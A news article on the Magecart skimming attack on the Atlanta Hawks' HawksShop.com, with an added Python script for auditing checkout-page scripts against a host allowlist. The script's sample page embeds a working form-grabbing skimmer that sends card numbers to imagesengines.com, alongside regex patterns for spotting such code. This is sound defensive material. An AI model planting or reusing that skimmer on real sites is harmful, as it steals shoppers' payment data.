Cybercriminals using Magecart card-skimming code attacked the online store of the NBA’s Atlanta Hawks, stealing customers’ names, addresses and payment card numbers.
The Sanguine Labs team at Sanguine Security identified the offending code on the store’s checkout page on Saturday, April 20, according to a post on the security company’s website. But research from RiskIQ following this public disclosure revealed that the website, HawksShop.com, had been compromised for far longer than that.
“The first time we detected skimming code on the website was June 6th of 2017,” RiskIQ threat researcher Yonathan Klijnsma told SC Media. “The compromise wasn’t targeted however, it was one aimed at hundreds of websites at the same time.”
In an April 23 article, CNET reported that an Atlanta Hawks team representative said the malware is no longer active on the site. However, in a tweet published one day later, Sanguine Labs’ lead forensic analyst Willem de Groot responded to this claim by asking “Is it?” and displaying an image of apparent Magecart code, which suggests the problem code still remained.
As of 1 p.m. ET on April 24, HawksShop.com was temporarily down for maintenance, presumably to fix the issue. But de Groot told SC Media that this response only occurred very recently, after his tweet had been published.
“This week, I had reached out to the customer service, and also to their CRO, CIO and director of IT, but have not heard back since,” de Groot told SC Media.
“We take these matters of security and privacy extremely seriously,” said a statement sent to SC Media by the Hawks’ organization. “Yesterday, we were alerted the host site for HawksShop.com was subject to an isolated attack. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident. At this stage of the investigation, we believe that less than a handful of purchases on HawksShop.com were affected. We are continuing to investigate and will provide updates as needed.”
The statement did not address any of the other points of contention referenced by de Groot.
HawksShop.com runs on Adobe’s Magento Commerce Cloud 2.2 e-commerce system. Sanguine Labs suspects the intruders may have compromised the system via an insecure third-party component.
Sanguine researchers also linked this incident to the malicious domain imagesengines.com, to which stolen customer information was exfiltrated. The domain had been registered only recently, on March 25, 2019.
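The two findings above (a skimmer introduced through a third-party component on the checkout page, and a freshly registered exfiltration domain) suggest the check a store operator can run without waiting for a researcher’s tweet: inventory every script on the checkout page and flag anything that loads from, or sends data to, a host that is not on a known-good list. The following is an added example written for this article, not code from Sanguine Security, RiskIQ or the Hawks’ store. The checkout HTML is constructed for the example; only the host imagesengines.com comes from the article, while hawksshop.com and cdn.example-tagmanager.com are assumed to be the store’s legitimate script hosts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample checkout page (not HawksShop.com's real markup).
# imagesengines.com is the exfiltration host named in the article; the
# other two hosts are assumptions standing in for the store's own CDN.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://hawksshop.com/static/frontend/checkout.js"></script>
<script src="https://cdn.example-tagmanager.com/gtm.js"></script>
<script src="https://imagesengines.com/static/js/jquery.min.js"></script>
</head><body>
<form id="co-payment-form"><input name="cc_number"></form>
<script>
document.getElementById('co-payment-form').addEventListener('submit', function () {
  var d = btoa(JSON.stringify({n: document.forms[0].cc_number.value}));
  new Image().src = 'https://imagesengines.com/p.gif?d=' + d;
});
</script>
</body></html>
"""

# Assumed allowlist: hosts the store knowingly loads checkout scripts from.
ALLOWED_SCRIPT_HOSTS = {"hawksshop.com", "cdn.example-tagmanager.com"}

# Behaviours that, combined, look like a form-grabbing skimmer.
INLINE_RED_FLAGS = [
    (re.compile(r"addEventListener\(\s*['\"]submit['\"]"), "hooks form submit"),
    (re.compile(r"\b(?:btoa|atob)\s*\("), "base64 encodes/decodes data"),
    (re.compile(r"new\s+Image\(\)\.src\s*=|\bXMLHttpRequest\b|\bfetch\s*\(|sendBeacon"),
     "sends data out"),
]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def audit_checkout_scripts(html, allowed_hosts):
    """Return (kind, host, detail) findings for scripts that load from or
    talk to hosts outside the allowlist, or that behave like a skimmer."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = host_of(src)
        if host and host not in allowed_hosts:
            findings.append(("external_script_unknown_host", host, src))
    for body in parser.inline:
        flags = [label for rx, label in INLINE_RED_FLAGS if rx.search(body)]
        foreign = {h.lower() for h in URL_RE.findall(body)} - allowed_hosts
        # Two skimmer behaviours, or any outbound reference to a foreign host,
        # is enough to raise the script for review.
        if len(flags) >= 2 or foreign:
            findings.append(("inline_script_suspicious",
                             ", ".join(sorted(foreign)), "; ".join(flags)))
    return findings


if __name__ == "__main__":
    for finding in audit_checkout_scripts(SAMPLE_CHECKOUT_HTML, ALLOWED_SCRIPT_HOSTS):
        print(finding)
```

Run periodically against a fetched copy of the live checkout page and diff the findings against the previous run: a new host appearing on the page, or a new inline script that hooks the payment form, is exactly the change that sat unnoticed on HawksShop.com for almost two years. The same allowlist, expressed as a Content-Security-Policy `script-src` and `img-src`/`connect-src`, would also have kept the browser from loading the foreign script or sending the image beacon in the first place.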
The Magecart threat has grown in prominence over the last year, especially after attackers struck several big-name targets, including Ticketmaster UK, British Airways and Newegg.